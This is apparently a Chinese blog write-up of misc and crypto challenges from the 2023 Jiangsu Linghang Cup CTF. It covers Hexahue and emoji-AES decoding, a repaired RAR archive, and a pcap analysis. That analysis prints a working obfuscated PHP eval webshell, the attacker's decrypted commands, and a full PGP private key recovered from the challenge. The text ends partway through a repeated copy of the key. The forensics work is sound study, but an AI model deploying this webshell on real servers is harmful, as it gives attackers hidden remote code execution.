2023 江苏领航杯 misc密码wp

最新推荐文章于 2023-12-11 20:15:53 发布
最新推荐文章于 2023-12-11 20:15:53 发布
阅读量2.1k 收藏 3
点赞数 2
分类专栏: CTF-Writeup 文章标签: 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Ahi0upsec/article/details/132717024
版权

2023 江苏领航杯部分wp

misc

五彩缤纷

在这里插入图片描述
在这里插入图片描述
​博客记过:https://byxs20.github.io/posts/10343.html#52-Hexahue

对照解密出:JUSTKICKURASS

在线网站:​https://www.geocachingtoolbox.com/index.php?lang=en&page=hexahue

加上flag前缀"CnHongKe" 即为答案 CnHongKe{JUSTKICKURASS}

四重奏

打开附件看010

在这里插入图片描述发现rar文件没有文件头,我们修复一下,补上rar的文件头
补上文件头后发现压缩包能解压了

在这里插入图片描述

我们打开数据包看一下,追踪tcp流发现secret

在这里插入图片描述

0x64,0x47,0x68,0x70,0x63,0x31,0x39,0x70,0x63,0x31,0x39,0x77,0x59,0x58,0x4e,0x7a,0x64,0x32,0x52,0x66,0x4e,0x6a,0x46,0x69,0x59,0x6a,0x59,0x33,0x4e,0x6a,0x6b,0x78,0x5a,0x6d,0x46,0x6b,0x59,0x7a,0x42,0x6b,0x4d,0x41,0x3d,0x3d
===>HEX
dGhpc19pc19wYXNzd2RfNjFiYjY3NjkxZmFkYzBkMA==
===>base64
this_is_passwd_61bb67691fadc0d0

拿到的是个密码,我们看另外一个文件 .vrea

使用VreaCrypt工具进行解密挂载

在这里插入图片描述

拿到flag文件

🙃💵🌿🎤🚪🌏🐎🥋🚫😆✅🤣👉🏎🌿🍴👌🍍🖐🍴🚫✅😇🌿📮📂🌊🦓☺👁🎈🚰✖💵🌪🚹☂🚫👁🐅🐘🌊🌿✉🐅💵⌨🍴😁🚫🌊😇🚨☀🐅🍌🌉💵👉☃⌨😂🌉🍍🍎📮🖐😇🦓🌏🚨☂🌪👣🏹🛩📮☀☀👁🍎👉💵😡💧😀🗒🗒

===》emojo-aes  https://aghorler.github.io/emoji-aes/
901915893b6aaf7211248f2e70569484
加上flag头
CnHongKe{901915893b6aaf7211248f2e70569484}

​​

webshell

一个数据包,查看tcp流

在这里插入图片描述

phar反序列化,我们导出保存为 1.phar,或者使用在线网站:http://unphar.com/cn

<?php
echo file_get_contents("phar://1.phar/x")
?>

<?php
eval('$k="4297f44b";$kh="13955235245b";$kf="2497399d7a93";$p="jSuJBZSb72ybWzJ0";

function x($t,$k){
$c=strlen($k);$l=strlen($t);$o="";
for($i=0;$i<$l;){
for($j=0;($j<$c&&$i<$l);$j++,$i++)
{
$o.=$t[$i]^$k[$j];
}
}
return $o;
}
if (@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1) {
@ob_start();
@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));
$o=@ob_get_contents();
@ob_end_clean();
$r=@base64_encode(@x(@gzcompress($o),$k));
print("$p$kh$r$kf");
}');

稍微格式化一下

<?php

$k = "4297f44b";
$kh = "13955235245b";
$kf = "2497399d7a93";
$p = "jSuJBZSb72ybWzJ0";

function encode($t, $k)
{
    $c = strlen($k);
    $l = strlen($t);
    $o = "";
    for ($i = 0; $i < $l; ) {
        for ($j = 0; ($j < $c && $i < $l); $j++, $i++) {
            $o .= $t[$i] ^ $k[$j];
        }
    }
    return $o;
}

if (@preg_match("/$kh(.+)$kf/", @file_get_contents("php://input"), $m) == 1) {
    @ob_start();
    @eval(@gzuncompress(@encode(@base64_decode($m[1]), $k)));
    $o = @ob_get_contents();
    @ob_end_clean();
    $r = @base64_encode(@encode(@gzcompress($o), $k));
    print("$p$kh$r$kf");
}

需要注意要写一个 base64​ 填补的代码,不然python的b64decode解不开,会出现报错

虽然我们不知道请求包的加密过程,但是多看一些,可以发现固定的 **13955235245b​ + baseStr + 2497399d7a93​,所以正则表达式匹配再加解base64就好了

import os
import re
import zlib
import base64
from FlowAnalyzer import FlowAnalyzer


key = b"4297f44b"

def decode(t):
    data = [t[i] ^ key[i%len(key)] for i in range(len(t))]
    return zlib.decompress(bytes(data))

def b64Padding(line):
    missing_padding = len(line) % 4
    if missing_padding != 0:
        line += b"=" * (4 - missing_padding)
    return line

if __name__ == '__main__':
    baseDir = os.path.dirname(os.path.abspath(__file__))
    flowPath = os.path.join(baseDir, "backdoor.pcapng")
    display_filter = "(http.request and urlencoded-form) or (http.request and data-text-lines) or (http.request and mime_multipart) or (http.response.code == 200 and data-text-lines)"

    jsonPath = FlowAnalyzer.get_json_data(flowPath, display_filter=display_filter)
    with open("dec.txt", "w", encoding="utf-8") as f:
        for count, dic in enumerate(FlowAnalyzer(jsonPath).generate_http_dict_pairs(), start=1):

            response_num, file_data = dic['response']
            if file_data.startswith(b"jSuJBZSb72ybWzJ013955235245b"):
                file_data = file_data[28:-12]
                dec = decode(base64.b64decode(file_data))

            request = dic.get("request")
            if not request:
                continue

            request_num, file_data = request
          
            r = re.findall(b"13955235245b(.*?)2497399d7a93", file_data)[0]
            file_data = decode(base64.b64decode(b64Padding(r)))
            f.write(f"序号: {request_num}请求包:\n{file_data.decode()}\n")
            f.write(f"序号: {response_num}返回包:\n{dec.decode()}" + "\n" + "*" * 50 + "\n")

序号: 3541请求包:
echo(77515);
序号: 3544返回包:
77515
**************************************************
序号: 3554请求包:
@error_reporting(0);@system('echo 23640');
序号: 3557返回包:
23640

**************************************************
序号: 3567请求包:
@error_reporting(0);print(@gethostname());
序号: 3570返回包:
kali
**************************************************
序号: 3580请求包:
@error_reporting(0);
                if(is_callable('posix_getpwuid')&&is_callable('posix_geteuid')) {
                    $u=@posix_getpwuid(@posix_geteuid());
                    if($u){
                        $u=$u['name'];
                    } else {
                        $u=getenv('username');
                    }
                    print($u);
                }
          
序号: 3583返回包:
www-data
**************************************************
序号: 3593请求包:
@error_reporting(0);@chdir('.')&&print(@getcwd());
序号: 3596返回包:
/var/www/html
**************************************************
序号: 3606请求包:
chdir('/var/www/html');@error_reporting(0);@system('pwd 2>&1');
序号: 3609返回包:
/var/www/html

**************************************************
序号: 3686请求包:
chdir('/var/www/html');@error_reporting(0);@chdir('/home')&&print(@getcwd());
序号: 3689返回包:
/home
**************************************************
序号: 3732请求包:
chdir('/home');@error_reporting(0);@system('ls -al 2>&1');
序号: 3735返回包:
total 20
drwxr-xr-x  5 root root 4096 Aug  1 07:54 .
drwxr-xr-x 19 root root 4096 Sep 27  2022 ..
drwxr-xr-x 15 kali kali 4096 Feb 15 02:01 kali
drwxr-xr-x  3 ssor ssor 4096 Aug  1 08:20 ssor
drwxr-xr-x  2 root root 4096 Aug  1 07:54 xela

**************************************************
序号: 3804请求包:
chdir('/home');@error_reporting(0);@chdir('ssor')&&print(@getcwd());
序号: 3807返回包:
/home/ssor
**************************************************
序号: 3836请求包:
chdir('/home/ssor');@error_reporting(0);@system('ls -al 2>&1');
序号: 3839返回包:
total 24
drwxr-xr-x 3 ssor ssor 4096 Aug  1 08:20 .
drwxr-xr-x 5 root root 4096 Aug  1 07:54 ..
drwx------ 3 ssor ssor 4096 Aug  1 08:15 .gnupg
-rw-r--r-- 1 ssor ssor  756 Aug  1 08:06 flag-cipher.txt
-rw-r--r-- 1 ssor ssor 5192 Aug  1 08:14 private-file.key

**************************************************
序号: 5973请求包:
chdir('/home/ssor');@error_reporting(0);@system('cat flag-cipher.txt 2>&1');
序号: 5976返回包:
-----BEGIN PGP MESSAGE-----

hQGMA6wUH1ZtpnvJAQwA3A8G5cCfvajJ7Uyf3/Y7kIkV7pTjJ7JGzc0CBmfHgP0c
qdpyZE8uXUacgcneb5upPg7IgfzeGBLJQYFioH7yKwlrek3RNSOmfe6tGtMvHmKL
54JJmpqkLZe9NToYTBpfTn4ksPc1cQzkS3iMt7VqJ9/fzvdLFQJtf5k9qE30GLkm
Nsr0HxS6ebQLxaIMGkQWMlUrzpLc0I5CS6Vol9uCkPgY1UpnpZ+bD9NWlX6XvZ5L
cX1SJBogMTHCytn5ugpt01AsDtgctRDTpqy2WTwrJ3rdz7V/v5ujaQHLtOAjg6mW
1wgTrZAqYAo70OjR0204FOHZFPsWDrlLYi6YHXXZZuxrzJz2jze13msIgfNu6cIj
gaGBENChQpQCKpkQcybnjvfVumukAODze8dJhqxkFnvm97X5X5Svxctch9Taebqc
wgsbxEuveouXRqIe0XNQIHiCc/YbG+s+dAa0Feajs0tvFynmTn9CT3uQGVHNtYZy
5DxNucUHKUQR/hW7aPio0m4BPSapvQlx3fJQ0Mnudim50wimxKExH6Lh5gE46edy
deuXuhPurHiuZYB868x6Wcq1VeXkZyWZRa2+AZUZ1RE1J5+6Li0o+iIXsJ1Che0x
x05QYR/6zXhHNV7aRZ6kWacJNwgXPKTG07ONzhYhew==
=omaY
-----END PGP MESSAGE-----

**************************************************
序号: 6066请求包:
chdir('/home/ssor');@error_reporting(0);@system('cat private-file.key 2>&1');
序号: 6069返回包:
-----BEGIN PGP PRIVATE KEY BLOCK-----

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
=MkMD
-----END PGP PRIVATE KEY BLOCK-----

**************************************************
序号: 6306请求包:
chdir('/home/ssor');@error_reporting(0);@system('php -v 2>&1');
序号: 6308返回包:
PHP 8.1.5 (cli) (built: May 16 2022 17:15:25) (NTS)
Copyright (c) The PHP Group
Zend Engine v4.1.5, Copyright (c) Zend Technologies
    with Zend OPcache v8.1.5, Copyright (c), by Zend Technologies

**************************************************
序号: 6425请求包:
chdir('/home/ssor');@error_reporting(0);@system('ps -eaf|grep gpg 2>&1');
序号: 6430返回包:
ssor      378309       1  0 08:01 ?        00:00:00 gpg-agent --homedir /home/ssor/.gnupg --use-standard-socket --daemon
root      378356     864  0 08:03 ?        00:00:06 /usr/bin/gpg-agent --supervised
www-data  379905  379804  0 08:33 ?        00:00:00 sh -c ps -eaf|grep gpg 2>&1
www-data  379907  379905  0 08:33 ?        00:00:00 grep gpg

**************************************************
序号: 6492请求包:
chdir('/home/ssor');@error_reporting(0);@system('exit 2>&1');
序号: 6495返回包:

**************************************************

-----BEGIN PGP MESSAGE-----

hQGMA6wUH1ZtpnvJAQwA3A8G5cCfvajJ7Uyf3/Y7kIkV7pTjJ7JGzc0CBmfHgP0c
qdpyZE8uXUacgcneb5upPg7IgfzeGBLJQYFioH7yKwlrek3RNSOmfe6tGtMvHmKL
54JJmpqkLZe9NToYTBpfTn4ksPc1cQzkS3iMt7VqJ9/fzvdLFQJtf5k9qE30GLkm
Nsr0HxS6ebQLxaIMGkQWMlUrzpLc0I5CS6Vol9uCkPgY1UpnpZ+bD9NWlX6XvZ5L
cX1SJBogMTHCytn5ugpt01AsDtgctRDTpqy2WTwrJ3rdz7V/v5ujaQHLtOAjg6mW
1wgTrZAqYAo70OjR0204FOHZFPsWDrlLYi6YHXXZZuxrzJz2jze13msIgfNu6cIj
gaGBENChQpQCKpkQcybnjvfVumukAODze8dJhqxkFnvm97X5X5Svxctch9Taebqc
wgsbxEuveouXRqIe0XNQIHiCc/YbG+s+dAa0Feajs0tvFynmTn9CT3uQGVHNtYZy
5DxNucUHKUQR/hW7aPio0m4BPSapvQlx3fJQ0Mnudim50wimxKExH6Lh5gE46edy
deuXuhPurHiuZYB868x6Wcq1VeXkZyWZRa2+AZUZ1RE1J5+6Li0o+iIXsJ1Che0x
x05QYR/6zXhHNV7aRZ6kWacJNwgXPKTG07ONzhYhew==
=omaY
-----END PGP MESSAGE-----

-----BEGIN PGP PRIVATE KEY BLOCK-----

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
